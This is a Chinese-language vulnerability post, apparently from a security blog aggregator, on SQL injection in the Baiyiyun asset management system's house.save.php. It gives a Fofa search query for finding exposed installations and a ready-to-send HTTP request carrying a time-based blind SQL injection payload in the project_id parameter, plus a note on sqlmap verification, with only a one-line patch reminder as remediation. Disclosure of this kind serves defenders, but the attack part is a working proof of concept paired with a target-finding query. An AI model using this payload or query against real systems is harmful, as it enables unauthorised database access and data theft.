当前位置: 首页 > article >正文

百易云资产系统 house.save.php SQL注入

0x01 漏洞描述:

百易云资产管理运营系统是一款综合性资产管理平台,旨在帮助企业高效管理和优化资产生命周期。系统提供资产采购、维护、报废等全流程管理功能,并通过云端技术实现数据的实时同步与分析。用户可以轻松跟踪资产状态、生成报告,并进行预算控制,提升资产利用效率,降低运营成本。百易云以其智能化、自动化的特点,助力企业实现资产管理的科学化与精细化。其在house.save.php中存在sql注入。

0x02 搜索语句:

Fofa:body="不要着急,点此"

0x03 漏洞复现:

GET /adminx/house.save.php?project_id=1%20and%20(select%201%20from%20(select(sleep(5-(if((1=1),%200,%202)))))test)#---- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

 sqlmap验证

0x04 修复建议:

官方已发布补丁 请即时修复。


http://www.kler.cn/a/312214.html

相关文章:

  • 【Python】爬虫通过验证码
  • Ubuntu20.4系统编译瑞芯微RK3568 SDK
  • 问:MySQL主从同步的机制梳理?
  • git status 命令卡顿的排查
  • TVM计算图分割--分割方式
  • Labelme标注数据的一些操作
  • tomcat知识
  • 【Android】ViewPager
  • 生信初学者教程(三):介绍
  • [Linux] 进程优先级 进程的调度与切换 环境变量详解
  • qt--Qml控件库如何从外部导入
  • 虾皮选品技巧有哪些?超全Shopee选品的方法和技巧分享!
  • C#无标题栏窗体拖动
  • 物联网开发+充电桩管理系统+充电桩系统源码
  • 【北京迅为】《STM32MP157开发板使用手册》- 第四十二章 事件实验
  • Java设计模式—面向对象设计原则(四) ----->接口隔离原则(ISP) (完整详解,附有代码+案例)
  • 基于JavaWeb开发的java+Springboot操作系统教学交流平台详细设计实现
  • 探索AI大模型的未来:电信运营商与云服务商的新征途@附58页PDF文件下载
  • liunx 计划任务
  • VRRP协议原理
  • 《计算机网络名词解释》
  • 【Python报错已解决】ModuleNotFoundError: No module named ‘paddle‘
  • 量化交易软件、接口、API、区别、用法,有什么好用的么
  • Vue2中路由的介绍和使用
  • UDS诊断-面试题2
  • 掌握Protobuf精髓:深入解析.proto文件语法及高效应用